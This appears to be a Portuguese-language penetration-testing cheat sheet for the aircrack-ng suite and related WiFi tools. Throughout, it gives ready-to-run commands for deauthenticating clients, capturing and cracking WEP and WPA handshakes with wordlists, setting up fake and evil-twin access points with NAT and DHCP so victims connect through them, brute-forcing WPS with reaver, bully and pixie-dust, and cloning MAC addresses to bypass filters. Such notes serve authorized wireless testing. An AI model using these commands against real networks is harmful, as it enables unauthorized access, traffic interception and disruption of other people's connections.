Pular para o conteúdo principal

aircrack-ng suite

Aircrack-ng é um conjunto completo de ferramentas para avaliar a segurança de redes WiFi.


Airmon-ng

Checando processos conflitantes:

airmon-ng check

Matando processos conflitantes:

airmon-ng check kill

Iniciando modo monitor:

airmon-ng start wlan0
cuidado

O nome da interface pode variar.

Setando canal específico:

iwconfig wlan0mon channel 1

Airodump-ng

Ver informações das redes wireless:

airodump-ng wlan0mon

Filtrando por canal:

airodump-ng -c 10 wlan0mon

Filtrando por BSSID:

airodump-ng --bssid 00:11:22:AA:BB:CC wlan0mon

Filtrando por tipo de criptografia:

airodump-ng --encrypt wep wlan0mon

Verificando redes com WPS:

airodump-ng wlan0mon --wps
wash -i wlan0mon -C

Capturando os pacotes e escrevendo em um arquivo:

airodump-ng -c 10 --bssid 00:11:22:AA:BB:CC -w capture wlan0mon

Aireplay-ng

Para acelerar a captura de pacotes através do airodump-ng no ataque WEP:

aireplay-ng -3 -b 00:11:22:AA:BB:CC -h AA:BB:CC:DD:EE:FF:99 wlan0mon

-b ==> BSSID do roteador alvo.
-h ==> BSSID do cliente conectado ao roteador.

Para acelerar a captura de handshakes através do airodump-ng no ataque WPA:

aireplay-ng -0 5 -a 00:11:22:AA:BB:CC -c AA:BB:CC:DD:EE:FF:99 wlan0mon

-a ==> MAC access point.
-c ==> MAC do cliente.
-0 5 ==> Deauth cliente 5 vezes.

Aircrack-ng

Quebra do arquivo capturado no airodump-ng para redes WEP:

aircrack-ng capture-01.cap

Quebra do arquivo capturado no airodump-ng para redes WPA:

aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

Concatenar crunch e o aircrack-ng:

crunch 15 15 -t EmpresaAlfa%%%% 0123456789 | \
aircrack-ng captura-01.cap -w - -e EmpresaAlfa

Airdecap-ng

Desencriptando pacotes escriptados em rede wireless:

airdecap-ng -w A0:11:22:33:44:55:66:77:CC:B1:B4:8A:D3 capture-01.cap

-w ==> Senha em HEX da rede.

Airbase-ng

Criando AP Fake OPN:

airbase-ng wlan0mon -c 3 -e FreeWifi

Criando AP Fake WPA2:

airbase-ng wlan0mon -c 3 -e FreeWifi -Z 4

Configurando AP Fake para possuir acesso à internet:
1- echo 1 > /proc/sys/net/ipv4/ip_forward
2- iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
3- apt install isc-dhcp-server
4- nano /etc/default/isc-dhcp-server

/etc/default/isc-dhcp-server
INTERFACES="at0"

5- nano /etc/dhcp/dhcpd.conf

/etc/dhcp/dhcpd.conf
option domain-name-servers 8.8.8.8, 8.8.4.4;  

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.10 10.0.0.100;
option routers 10.0.0.1;
}

5- ifconfig at0 10.0.0.1/24
6- service isc-dhcp-server start

Evil Twin

Consiste em criar uma rede idêntica a do alvo.

Criando rede através do airbase-ng:

airbase-ng wlan0mon -c 10 -e EmpresaAlfa -a 00:11:22:33:44:55 -Z 4

Agora iremos efetuar o Death dos clientes:

aireplay-ng wlan0mon -0 5 -a 00:11:22:33:44:55

Logo os usuários irão se conectar no AP Fake.

Bully

Brute force em WPS:

bully wlan0mon -b 00:11:22:AA:BB:CC -e EmpresaAlfa -c 10

Reaver

Brute force em WPS:

reaver -i wlan0mon -b 00:11:22:AA:BB:CC -vv

Ataque PixieWPS:

reaver -i wlan0mon -b 00:11:22:AA:BB:CC -vv -K 1
reaver -i wlan0mon -b 00:11:22:AA:BB:CC -vv -K 1 -P

Utilizando timeout e delay:

reaver -i wlan0mon -b 00:11:22:AA:BB:CC -vv -t 2 -d 5

MAC Changer

Clonando MAC de cliente para conectar em redes com MAC Filter:

ifconfig wlan0 down  
macchanger -m AA:BB:CC:DD:EE:FF:99 wlan0  
ifconfig wlan0 up  
service NetworkManager